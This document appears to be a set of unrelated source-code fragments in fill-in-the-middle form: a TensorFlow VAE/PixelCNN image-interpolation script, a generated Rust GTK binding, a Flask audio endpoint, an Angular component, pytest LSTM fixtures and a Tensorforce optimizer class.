output = lib.ops.conv2d.Conv2D('Dec1.Out', input_dim=DIM_PIX_1, output_dim=256*N_CHANNELS, filter_size=1, mask_type=('b', N_CHANNELS), he_init=False, inputs=output)
else:
if WIDTH == 64:
output = lib.ops.conv2d.Conv2D('Dec1.Out', input_dim=DIM_0, output_dim=256*N_CHANNELS, filter_size=1, he_init=False, inputs=output)
else:
output = lib.ops.conv2d.Conv2D('Dec1.Out', input_dim=DIM_1, output_dim=256*N_CHANNELS, filter_size=1, he_init=False, inputs=output)
return tf.transpose(
tf.reshape(output, [-1, 256, N_CHANNELS, HEIGHT, WIDTH]),
[0,2,3,4,1]
)
def Enc2(h1):
output = h1
if LATENTS1_WIDTH == 16:
output = ResidualBlock('Enc2.Res0', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res1Pre', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res1Pre2', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res1', input_dim=DIM_2, output_dim=DIM_3, filter_size=3, resample='down', he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res2Pre', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res2Pre2', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res2Pre3', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res1A', input_dim=DIM_3, output_dim=DIM_4, filter_size=3, resample='down', he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res2PreA', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res2', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res2Post', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = tf.reshape(output, [-1, 4*4*DIM_4])
output = lib.ops.linear.Linear('Enc2.Output', input_dim=4*4*DIM_4, output_dim=2*LATENT_DIM_2, inputs=output)
return output
def Dec2(latents, targets):
output = tf.clip_by_value(latents, -50., 50.) |
output = tf.reshape(output, [-1, DIM_4, 4, 4])
output = ResidualBlock('Dec2.Res1Pre', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res1', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res1Post', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res3', input_dim=DIM_4, output_dim=DIM_3, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res3Post', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res3Post2', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res3Post3', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
if LATENTS1_WIDTH == 16:
output = ResidualBlock('Dec2.Res3Post5', input_dim=DIM_3, output_dim=DIM_2, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res3Post6', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res3Post7', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res3Post8', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
if HIGHER_LEVEL_PIXCNN:
if LATENTS1_WIDTH == 16:
masked_targets = lib.ops.conv2d.Conv2D('Dec2.Pix1', input_dim=LATENT_DIM_1, output_dim=DIM_2, filter_size=5, mask_type=('a', PIX_2_N_BLOCKS), he_init=False, inputs=targets)
else:
masked_targets = lib.ops.conv2d.Conv2D('Dec2.Pix1', input_dim=LATENT_DIM_1, output_dim=DIM_3, filter_size=5, mask_type=('a', PIX_2_N_BLOCKS), he_init=False, inputs=targets)
# Make the variance of output and masked_targets roughly match
output /= 2
output = tf.concat([masked_targets, output], axis=1)
if LATENTS1_WIDTH == 16:
output = ResidualBlock('Dec2.Pix2Res', input_dim=2*DIM_2, output_dim=DIM_PIX_2, filter_size=3, mask_type=('b', PIX_2_N_BLOCKS), he_init=True, inputs=output)
else:
output = ResidualBlock('Dec2.Pix2Res', input_dim=2*DIM_3, output_dim=DIM_PIX_2, filter_size=3, mask_type=('b', PIX_2_N_BLOCKS), he_init=True, inputs=output)
output = ResidualBlock('Dec2.Pix3Res', input_dim=DIM_PIX_2, output_dim=DIM_PIX_2, filter_size=3, mask_type=('b', PIX_2_N_BLOCKS), he_init=True, inputs=output)
output = ResidualBlock('Dec2.Pix4Res', input_dim=DIM_PIX_2, output_dim=DIM_PIX_2, filter_size=1, mask_type=('b', PIX_2_N_BLOCKS), he_init=True, inputs=output)
output = lib.ops.conv2d.Conv2D('Dec2.Out', input_dim=DIM_PIX_2, output_dim=2*LATENT_DIM_1, filter_size=1, mask_type=('b', PIX_2_N_BLOCKS), he_init=False, inputs=output)
else:
if LATENTS1_WIDTH == 16:
output = lib.ops.conv2d.Conv2D('Dec2.Out', input_dim=DIM_2, output_dim=2*LATENT_DIM_1, filter_size=1, mask_type=('b', PIX_2_N_BLOCKS), he_init=False, inputs=output)
else:
output = lib.ops.conv2d.Conv2D('Dec2.Out', input_dim=DIM_3, output_dim=2*LATENT_DIM_1, filter_size=1, mask_type=('b', PIX_2_N_BLOCKS), he_init=False, inputs=output)
return output
# Only for 32px_cifar, 64px_big_onelevel, and MNIST. Needs modification for others.
def EncFull(images):
output = images
if WIDTH == 32: #64
if EMBED_INPUTS:
output = lib.ops.conv2d.Conv2D('EncFull.Input', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_0, filter_size=1, inputs=output, he_init=False)
else:
output = lib.ops.conv2d.Conv2D('EncFull.Input', input_dim=N_CHANNELS, output_dim=DIM_0, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('EncFull.Res1', input_dim=DIM_0, output_dim=DIM_0, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res2', input_dim=DIM_0, output_dim=DIM_1, filter_size=3, resample='down', inputs=output)
output = ResidualBlock('EncFull.Res3', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res4', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res5', input_dim=DIM_1, output_dim=DIM_2, filter_size=3, resample='down', inputs=output)
output = ResidualBlock('EncFull.Res6', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res7', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res8', input_dim=DIM_2, output_dim=DIM_3, filter_size=3, resample='down', inputs=output)
output = ResidualBlock('EncFull.Res9', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res10', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res11', input_dim=DIM_3, output_dim=DIM_4, filter_size=3, resample='down', inputs=output)
output = ResidualBlock('EncFull.Res12', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res13', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, inputs=output)
output = tf.reshape(output, [-1, 2*2*DIM_4])
output = lib.ops.linear.Linear('EncFull.Output', input_dim=2*2*DIM_4, output_dim=2*LATENT_DIM_2, initialization='glorot', inputs=output)
else:
if EMBED_INPUTS:
output = lib.ops.conv2d.Conv2D('EncFull.Input', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_1, filter_size=1, inputs=output, he_init=False)
else:
output = lib.ops.conv2d.Conv2D('EncFull.Input', input_dim=N_CHANNELS, output_dim=DIM_1, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('EncFull.Res1', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res2', input_dim=DIM_1, output_dim=DIM_2, filter_size=3, resample='down', inputs=output)
output = ResidualBlock('EncFull.Res3', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res4', input_dim=DIM_2, output_dim=DIM_3, filter_size=3, resample='down', inputs=output)
output = ResidualBlock('EncFull.Res5', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res6', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = tf.reduce_mean(output, reduction_indices=[2,3])
output = lib.ops.linear.Linear('EncFull.Output', input_dim=DIM_3, output_dim=2*LATENT_DIM_2, initialization='glorot', inputs=output)
return output
# Only for 32px_CIFAR, 64px_big_onelevel and MNIST. Needs modification for others.
def DecFull(latents, images):
output = tf.clip_by_value(latents, -50., 50.)
if WIDTH == 32: # 64:LEILAEDIT. Also changed 4*4 to 2*2 and 4,4 to 2,2 in the two lines below
output = lib.ops.linear.Linear('DecFull.Input', input_dim=LATENT_DIM_2, output_dim=2*2*DIM_4, initialization='glorot', inputs=output)
output = tf.reshape(output, [-1, DIM_4, 2, 2])
output = ResidualBlock('DecFull.Res2', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res3', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res4', input_dim=DIM_4, output_dim=DIM_3, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res5', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res6', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res7', input_dim=DIM_3, output_dim=DIM_2, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res8', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res9', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res10', input_dim=DIM_2, output_dim=DIM_1, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res11', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res12', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res13', input_dim=DIM_1, output_dim=DIM_0, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res14', input_dim=DIM_0, output_dim=DIM_0, filter_size=3, resample=None, he_init=True, inputs=output)
else:
output = lib.ops.linear.Linear('DecFull.Input', input_dim=LATENT_DIM_2, output_dim=DIM_3, initialization='glorot', inputs=output)
output = tf.reshape(tf.tile(tf.reshape(output, [-1, DIM_3, 1]), [1, 1, 49]), [-1, DIM_3, 7, 7])
output = ResidualBlock('DecFull.Res2', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res3', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res4', input_dim=DIM_3, output_dim=DIM_2, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res5', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res6', input_dim=DIM_2, output_dim=DIM_1, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res7', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, he_init=True, inputs=output)
if WIDTH == 32: #64:
dim = DIM_0
else:
dim = DIM_1
if PIXEL_LEVEL_PIXCNN:
if EMBED_INPUTS:
masked_images = lib.ops.conv2d.Conv2D('DecFull.Pix1', input_dim=N_CHANNELS*DIM_EMBED, output_dim=dim, filter_size=3, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
else:
masked_images = lib.ops.conv2d.Conv2D('DecFull.Pix1', input_dim=N_CHANNELS, output_dim=dim, filter_size=3, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
# Warning! Because of the masked convolutions it's very important that masked_images comes first in this concat
output = tf.concat([masked_images, output], axis=1)
output = ResidualBlock('DecFull.Pix2Res', input_dim=2*dim, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
output = ResidualBlock('DecFull.Pix3Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
output = ResidualBlock('DecFull.Pix4Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
if WIDTH != 32: #64: LEILAEDIT
output = ResidualBlock('DecFull.Pix5Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
output = lib.ops.conv2d.Conv2D('Dec1.Out', input_dim=DIM_PIX_1, output_dim=256*N_CHANNELS, filter_size=1, mask_type=('b', N_CHANNELS), he_init=False, inputs=output)
else:
output = lib.ops.conv2d.Conv2D('Dec1.Out', input_dim=dim, output_dim=256*N_CHANNELS, filter_size=1, he_init=False, inputs=output)
return tf.transpose(
tf.reshape(output, [-1, 256, N_CHANNELS, HEIGHT, WIDTH]),
[0,2,3,4,1]
)
def split(mu_and_logsig):
mu, logsig = tf.split(mu_and_logsig, 2, axis=1)
sig = 0.5 * (tf.nn.softsign(logsig)+1)
logsig = tf.log(sig)
return mu, logsig, sig
def clamp_logsig_and_sig(logsig, sig):
# Early during training (see BETA_ITERS), stop sigma from going too low
floor = 1. - tf.minimum(1., tf.cast(total_iters, 'float32') / BETA_ITERS)
log_floor = tf.log(floor)
return tf.maximum(logsig, log_floor), tf.maximum(sig, floor)
scaled_images = (tf.cast(images, 'float32') - 128.) / 64.
if EMBED_INPUTS:
embedded_images = lib.ops.embedding.Embedding('Embedding', 256, DIM_EMBED, images)
embedded_images = tf.transpose(embedded_images, [0,4,1,2,3])
embedded_images = tf.reshape(embedded_images, [-1, DIM_EMBED*N_CHANNELS, HEIGHT, WIDTH])
if MODE == 'one_level':
# Layer 1
if EMBED_INPUTS:
mu_and_logsig1 = EncFull(embedded_images)
else:
mu_and_logsig1 = EncFull(scaled_images)
mu1, logsig1, sig1 = split(mu_and_logsig1)
eps = tf.random_normal(tf.shape(mu1))
latents1 = mu1 # LEILAEDIT
if EMBED_INPUTS:
outputs1 = DecFull(latents1, embedded_images)
else:
outputs1 = DecFull(latents1, scaled_images)
reconst_cost = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=tf.reshape(outputs1, [-1, 256]),
labels=tf.reshape(images, [-1])
)
)
# Assembly
# An alpha of exactly 0 can sometimes cause inf/nan values, so we're
# careful to avoid it.
alpha = tf.minimum(1., tf.cast(total_iters+1, 'float32') / ALPHA1_ITERS) * KL_PENALTY
kl_cost_1 = tf.reduce_mean(
lib.ops.kl_unit_gaussian.kl_unit_gaussian(
mu1,
logsig1,
sig1
)
)
kl_cost_1 *= float(LATENT_DIM_2) / (N_CHANNELS * WIDTH * HEIGHT)
cost = reconst_cost + (alpha * kl_cost_1)
elif MODE == 'two_level':
# Layer 1
if EMBED_INPUTS:
mu_and_logsig1, h1 = Enc1(embedded_images)
else:
mu_and_logsig1, h1 = Enc1(scaled_images)
mu1, logsig1, sig1 = split(mu_and_logsig1)
if mu1.get_shape().as_list()[2] != LATENTS1_HEIGHT:
raise Exception("LATENTS1_HEIGHT doesn't match mu1 shape!")
if mu1.get_shape().as_list()[3] != LATENTS1_WIDTH:
raise Exception("LATENTS1_WIDTH doesn't match mu1 shape!")
eps = tf.random_normal(tf.shape(mu1))
latents1 = mu1 + (eps * sig1)
if EMBED_INPUTS:
outputs1 = Dec1(latents1, embedded_images)
outputs1_sample = Dec1(latents1_sample, embedded_images)
else:
outputs1 = Dec1(latents1, scaled_images)
outputs1_sample = Dec1(latents1_sample, scaled_images)
reconst_cost = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=tf.reshape(outputs1, [-1, 256]),
labels=tf.reshape(images, [-1])
)
)
# Layer 2
mu_and_logsig2 = Enc2(h1)
mu2, logsig2, sig2 = split(mu_and_logsig2)
eps = tf.random_normal(tf.shape(mu2))
latents2 = mu2 + (eps * sig2)
outputs2 = Dec2(latents2, latents1)
mu1_prior, logsig1_prior, sig1_prior = split(outputs2)
logsig1_prior, sig1_prior = clamp_logsig_and_sig(logsig1_prior, sig1_prior)
mu1_prior = 2. * tf.nn.softsign(mu1_prior / 2.)
# Assembly
# An alpha of exactly 0 can sometimes cause inf/nan values, so we're
# careful to avoid it.
alpha1 = tf.minimum(1., tf.cast(total_iters+1, 'float32') / ALPHA1_ITERS) * KL_PENALTY
alpha2 = tf.minimum(1., tf.cast(total_iters+1, 'float32') / ALPHA2_ITERS) * alpha1# * KL_PENALTY
kl_cost_1 = tf.reduce_mean(
lib.ops.kl_gaussian_gaussian.kl_gaussian_gaussian(
mu1,
logsig1,
sig1,
mu1_prior,
logsig1_prior,
sig1_prior
)
)
kl_cost_2 = tf.reduce_mean(
lib.ops.kl_unit_gaussian.kl_unit_gaussian(
mu2,
logsig2,
sig2
)
)
kl_cost_1 *= float(LATENT_DIM_1 * LATENTS1_WIDTH * LATENTS1_HEIGHT) / (N_CHANNELS * WIDTH * HEIGHT)
kl_cost_2 *= float(LATENT_DIM_2) / (N_CHANNELS * WIDTH * HEIGHT)
cost = reconst_cost + (alpha1 * kl_cost_1) + (alpha2 * kl_cost_2)
tower_cost.append(cost)
if MODE == 'two_level':
tower_outputs1_sample.append(outputs1_sample)
full_cost = tf.reduce_mean(
tf.concat([tf.expand_dims(x, 0) for x in tower_cost], axis=0), 0
)
if MODE == 'two_level':
full_outputs1_sample = tf.concat(tower_outputs1_sample, axis=0)
# Sampling
if MODE == 'one_level':
ch_sym = tf.placeholder(tf.int32, shape=None)
y_sym = tf.placeholder(tf.int32, shape=None)
x_sym = tf.placeholder(tf.int32, shape=None)
logits = tf.reshape(tf.slice(outputs1, tf.stack([0, ch_sym, y_sym, x_sym, 0]), tf.stack([-1, 1, 1, 1, -1])), [-1, 256])
dec1_fn_out = tf.multinomial(logits, 1)[:, 0]
def dec1_fn(_latents, _targets, _ch, _y, _x):
return session.run(dec1_fn_out, feed_dict={latents1: _latents, images: _targets, ch_sym: _ch, y_sym: _y, x_sym: _x, total_iters: 99999, bn_is_training: False, bn_stats_iter:0})
def enc_fn(_images):
return session.run(latents1, feed_dict={images: _images, total_iters: 99999, bn_is_training: False, bn_stats_iter:0})
sample_fn_latents1 = np.random.normal(size=(1, LATENT_DIM_2)).astype('float32')
def generate_and_save_samples(tag):
from keras.utils import np_utils
x_augmentation_set = np.zeros((1, N_CHANNELS, HEIGHT, WIDTH)) #LEILEDIT: to enable .npy image saving
y_augmentation_set = np.zeros((1, 1, NUM_CLASSES)) #LEILEDIT: to enable .npy image saving.
# Function to translate numeric images into plots
def color_grid_vis(X, nh, nw, save_path):
# from github.com/Newmu
X = X.transpose(0,2,3,1)
h, w = X[0].shape[:2]
img = np.zeros((h*nh, w*nw, 3))
for n, x in enumerate(X):
j = n/nw
i = n%nw
img[j*h:j*h+h, i*w:i*w+w, :] = x
imsave(OUT_DIR + '/' + save_path, img)
numsamples = 1125
#pvals = np.linspace(0.2, 0.8, num=4)
#pvals = np.linspace(0.2, 0.8, num=1)
x_train_set_array = np.array(x_train_set)
y_train_set_array = np.array(y_train_set)
for imagenum in range(numsamples):
pvals = np.random.beta(0.2, 0.2, 1)
imageindices = random.sample(range(x_train_set.shape[0]),2)
imageindex1 = imageindices[0]
imageindex2 = imageindices[1]
# Draw the corresponding images and labels from the training data
image1 = x_train_set[imageindex1,:]
image2 = x_train_set[imageindex2,:]
label1 = y_train_set[imageindex1,:]
label2 = y_train_set[imageindex2,:]
# Reshape
image1 = image1.reshape(1, N_CHANNELS, HEIGHT, WIDTH)
image2 = image2.reshape(1, N_CHANNELS, HEIGHT, WIDTH)
label1 = label1.reshape(1, 1)
label2 = label2.reshape(1, 1)
# Save the original images
#print "Saving original samples"
#color_grid_vis(
# image1,
# 1,
# 1,
# 'original_1_classes{}and{}_num{}.png'.format(label1,label2,imagenum)
#)
#color_grid_vis(
# image2,
# 1,
# 1,
# 'original_2_classes{}and{}_num{}.png'.format(label1,label2,imagenum)
#)
# Encode the images
image_code1 = enc_fn(image1)
image_code2 = enc_fn(image2)
# Change labels to matrix form before performing interpolations
label1 = np_utils.to_categorical(label1, NUM_CLASSES)
label2 = np_utils.to_categorical(label2, NUM_CLASSES)
# Combine the latent codes
for p in pvals:
new_code = np.multiply(p,image_code1) + np.multiply((1-p),image_code2)
new_label = np.multiply(p,label1) + np.multiply((1-p),label2)
new_label = new_label.reshape(1,1,NUM_CLASSES)
samples = np.zeros(
(1, N_CHANNELS, HEIGHT, WIDTH),
dtype='int32')
print "Generating samples"
for y in xrange(HEIGHT):
for x in xrange(WIDTH):
for ch in xrange(N_CHANNELS):
next_sample = dec1_fn(new_code, samples, ch, y, x)
samples[:,ch,y,x] = next_sample
x_augmentation_set = np.concatenate((x_augmentation_set, samples), axis=0)#LEILAEDIT for .npy saving
y_augmentation_set = np.concatenate((y_augmentation_set, new_label), axis=0)#LEILAEDIT for .npy saving
color_grid_vis(
samples,
1,
1,
'interpolation1_classes{}and{}_pval{}_num{}.png'.format(label1,label2,p,imagenum)
)
x_augmentation_array = np.delete(x_augmentation_set, (0), axis=0)
y_augmentation_array = np.delete(y_augmentation_set, (0), axis=0)
x_augmentation_array = x_augmentation_array.astype(np.uint8)
np.save(OUT_DIR + '/' + 'x_augmentation_array_mean_beta_largesample', x_augmentation_array) #LEILAEDIT for .npy saving
np.save(OUT_DIR + '/' + 'y_augmentation_array_mean_beta_largesample', y_augmentation_array) #LEILAEDIT for .npy saving
# Run
if MODE == 'one_level':
prints=[
('alpha', alpha),
('reconst', reconst_cost),
('kl1', kl_cost_1)
]
decayed_lr = tf.train.exponential_decay(
LR,
total_iters,
LR_DECAY_AFTER,
LR_DECAY_FACTOR,
staircase=True
)
lib.sampling_loop_cifar_filter_3.sampling_loop( #LEIlAEDIT. TODO: update to remove uncessary arguments
session=session,
inputs=[total_iters, all_images],
inject_iteration=True,
bn_vars=(bn_is_training, bn_stats_iter),
cost=full_cost,
stop_after=TIMES['stop_after'],
prints=prints,
optimizer=tf.train.AdamOptimizer(decayed_lr),
train_data=train_data,
test_data=dev_data,
callback=generate_and_save_samples,
callback_every=TIMES['callback_every'],
test_every=TIMES['test_every'],
save_checkpoints=True
) | output = lib.ops.linear.Linear('Dec2.Input', input_dim=LATENT_DIM_2, output_dim=4*4*DIM_4, inputs=output) |
content_serializer.rs | // This file was generated by gir (https://github.com/gtk-rs/gir)
// from gir-files (https://github.com/gtk-rs/gir-files.git)
// DO NOT EDIT
use glib::translate::*;
use std::fmt;
glib::wrapper! {
pub struct ContentSerializer(Object<ffi::GdkContentSerializer>);
match fn {
type_ => || ffi::gdk_content_serializer_get_type(),
}
}
impl ContentSerializer {
#[doc(alias = "gdk_content_serializer_get_cancellable")]
#[doc(alias = "get_cancellable")]
pub fn | (&self) -> Option<gio::Cancellable> {
unsafe {
from_glib_none(ffi::gdk_content_serializer_get_cancellable(
self.to_glib_none().0,
))
}
}
#[doc(alias = "gdk_content_serializer_get_gtype")]
#[doc(alias = "get_gtype")]
pub fn type_(&self) -> glib::types::Type {
unsafe { from_glib(ffi::gdk_content_serializer_get_gtype(self.to_glib_none().0)) }
}
#[doc(alias = "gdk_content_serializer_get_mime_type")]
#[doc(alias = "get_mime_type")]
pub fn mime_type(&self) -> glib::GString {
unsafe {
from_glib_none(ffi::gdk_content_serializer_get_mime_type(
self.to_glib_none().0,
))
}
}
#[doc(alias = "gdk_content_serializer_get_output_stream")]
#[doc(alias = "get_output_stream")]
pub fn output_stream(&self) -> gio::OutputStream {
unsafe {
from_glib_none(ffi::gdk_content_serializer_get_output_stream(
self.to_glib_none().0,
))
}
}
#[doc(alias = "gdk_content_serializer_get_value")]
#[doc(alias = "get_value")]
pub fn value(&self) -> glib::Value {
unsafe { from_glib_none(ffi::gdk_content_serializer_get_value(self.to_glib_none().0)) }
}
#[doc(alias = "gdk_content_serializer_return_success")]
pub fn return_success(&self) {
unsafe {
ffi::gdk_content_serializer_return_success(self.to_glib_none().0);
}
}
}
impl fmt::Display for ContentSerializer {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
f.write_str("ContentSerializer")
}
}
| cancellable |
VoiceManagerApi.py | from flask import send_file
from python_helper import Constant as c
from python_helper import EnvironmentHelper, log
from python_framework import ResourceManager, FlaskUtil, HttpStatus, LogConstant
from queue_manager_api import QueueManager
import ModelAssociation
app = ResourceManager.initialize(__name__, ModelAssociation.MODEL, managerList=[
QueueManager()
])
@app.route(f'{app.api.baseUrl}/audios/<string:key>')
def getAudio(key=None): | return send_file(
path,
mimetype="audio/mp3",
as_attachment=False
), HttpStatus.OK
except Exception as exception:
MESSAGE_KEY = 'message'
responseDto = {MESSAGE_KEY: 'Audio not found'}
log.error(getAudio, responseDto.get(MESSAGE_KEY), exception=exception)
return responseDto, 404 | log.info(getAudio, f'{LogConstant.CONTROLLER_SPACE}{FlaskUtil.safellyGetVerb()}{c.SPACE_DASH_SPACE}{FlaskUtil.safellyGetUrl()}')
try:
dto = app.api.resource.service.speak.findAudioByKey(key)
path = f'''{dto.path.split(f'src{EnvironmentHelper.OS_SEPARATOR}')[-1]}{EnvironmentHelper.OS_SEPARATOR}{dto.name}{c.DOT}{dto.extension}''' |
crisis-list.component.ts | import { Observable } from 'rxjs';
import { switchMap } from 'rxjs/operators';
import { Component, OnInit } from '@angular/core';
import { ActivatedRoute } from '@angular/router';
import { CrisisService } from '../crisis.service';
import { Crisis } from '../crisis';
@Component({
selector: 'app-crisis-list',
templateUrl: './crisis-list.component.html',
styleUrls: ['./crisis-list.component.css']
})
export class | implements OnInit {
crisis$: Observable<Crisis[]>;
selectedId: number;
constructor(
private service: CrisisService,
private route: ActivatedRoute
) {}
ngOnInit() {
this.crisis$ = this.route.paramMap.pipe(
switchMap(params => {
this.selectedId = +params.get('id');
return this.service.getCrisises();
})
);
}
}
| CrisisListComponent |
conftest.py | r"""Setup fixtures for testing :py:class:`lmp.model.LSTMModel`."""
import pytest
import torch
from lmp.model import LSTMModel
from lmp.tknzr import BaseTknzr
@pytest.fixture
def lstm_model(
tknzr: BaseTknzr,
d_emb: int,
d_hid: int,
n_hid_lyr: int,
n_pre_hid_lyr: int,
n_post_hid_lyr: int,
p_emb: float,
p_hid: float,
) -> LSTMModel:
r"""Example ``LSTMModel`` instance."""
return LSTMModel(
d_emb=d_emb,
d_hid=d_hid,
n_hid_lyr=n_hid_lyr,
n_pre_hid_lyr=n_pre_hid_lyr,
n_post_hid_lyr=n_post_hid_lyr,
p_emb=p_emb,
p_hid=p_hid,
tknzr=tknzr,
)
@pytest.fixture
def batch_prev_tkids(lstm_model: LSTMModel) -> torch.Tensor:
|
@pytest.fixture
def batch_next_tkids(
lstm_model: LSTMModel,
batch_prev_tkids: torch.Tensor,
) -> torch.Tensor:
r"""Example target batch of token ids."""
# Same shape as `batch_prev_tkids`.
return torch.cat(
[
batch_prev_tkids[..., :-1],
torch.randint(
low=0,
high=lstm_model.emb.num_embeddings,
size=(batch_prev_tkids.shape[0], 1),
),
],
dim=1,
)
| r"""Example input batch of token ids."""
# Shape: (2, 3).
return torch.randint(
low=0,
high=lstm_model.emb.num_embeddings,
size=(2, 3),
) |
optimizer.py | # Copyright 2018 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import tensorflow as tf
from tensorforce import TensorforceError, util
from tensorforce.core import Module
class Optimizer(Module):
"""
Base class for optimizers which minimize a not yet further specified expression, usually some
kind of loss function. More generally, an optimizer can be considered as some method of
updating a set of variables.
"""
def __init__(self, name, summary_labels=None):
super().__init__(name=name, l2_regularization=0.0, summary_labels=summary_labels)
def tf_step(self, variables, **kwargs):
|
def tf_apply_step(self, variables, deltas):
"""
Applies the given (and already calculated) step deltas to the variable values.
Args:
variables: List of variables.
